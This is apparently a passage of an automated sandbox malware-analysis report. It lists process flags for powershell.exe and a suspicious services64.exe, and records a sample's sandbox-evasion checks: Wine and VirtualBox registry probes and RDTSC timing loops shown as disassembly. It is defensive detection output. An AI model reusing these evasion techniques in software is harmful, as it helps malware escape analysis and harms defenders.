                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\services64.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Tries to detect sandboxes / dynamic malware analysis system (registry check)
                        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Tries to detect virtualization through RDTSC time measurements
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CECB6 second address: 9CECBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CECBB second address: 9CECC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF624B4E7D6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CECC5 second address: 9CECC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CECC9 second address: 9CECE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF624B4E7E2h 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CECE8 second address: 9CECEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CECEC second address: 9CECF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CECF2 second address: 9CECFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF624C752F6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46A9A second address: B46A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46A9F second address: B46AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46AA5 second address: B46AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46AA9 second address: B46AB3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C752F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46C2B second address: B46C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B46D5D second address: B46D72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF624C752F6h 0x0000000a jmp 00007FF624C752FBh 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48D6C second address: B48D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48D70 second address: B48D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48D76 second address: B48D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624B4E7DEh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48E04 second address: B48E44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c xor ch, 00000042h 0x0000000f call 00007FF624C752F9h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF624C75302h 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48F51 second address: B48F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FF624B4E7D6h 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48F5E second address: B48F6C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48F6C second address: B48F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B48F70 second address: B48F8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C75307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49044 second address: B49062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007FF624B4E7D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FF624B4E7D8h 0x0000001c push esi 0x0000001d pop esi 0x0000001e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49062 second address: B490E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624C752FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jno 00007FF624C752FEh 0x00000013 pop eax 0x00000014 jmp 00007FF624C75302h 0x00000019 push 00000003h 0x0000001b mov edx, eax 0x0000001d push 00000000h 0x0000001f mov edx, 6DB888C0h 0x00000024 push 00000003h 0x00000026 jmp 00007FF624C75302h 0x0000002b call 00007FF624C752F9h 0x00000030 pushad 0x00000031 jbe 00007FF624C752F8h 0x00000037 js 00007FF624C752FCh 0x0000003d je 00007FF624C752F6h 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 je 00007FF624C752F6h 0x0000004e push eax 0x0000004f pop eax 0x00000050 popad 0x00000051 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B490E4 second address: B490FD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B490FD second address: B49101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49101 second address: B49141 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b jp 00007FF624B4E7D6h 0x00000011 jmp 00007FF624B4E7DFh 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FF624B4E7E0h 0x0000001d push edx 0x0000001e pop edx 0x0000001f popad 0x00000020 popad 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push esi 0x0000002a pop esi 0x0000002b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B49141 second address: B49147 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67B85 second address: B67B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FF624B4E7E0h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67D5D second address: B67D63 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67D63 second address: B67D83 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF624B4E7D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FF624B4E7D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007FF624B4E7D6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67D83 second address: B67D89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67D89 second address: B67D8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67D8F second address: B67D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF624C752F6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67F12 second address: B67F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67F1E second address: B67F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68252 second address: B68258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68258 second address: B6825C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B683AC second address: B683B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68928 second address: B6892F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68E8D second address: B68E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6914C second address: B6915A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jc 00007FF624C752F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6915A second address: B69167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007FF624B4E7DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B692CB second address: B692E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF624C75304h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B692E5 second address: B6930B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FF624B4E7D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6959D second address: B695B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF624C752FAh 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jg 00007FF624C752FCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B695B8 second address: B695C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF624B4E7D8h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B695C8 second address: B695CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B736E1 second address: B736FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7DDh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B736FB second address: B736FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73813 second address: B73817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73817 second address: B7382E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a js 00007FF624C752F6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7382E second address: B73832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73832 second address: B73838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
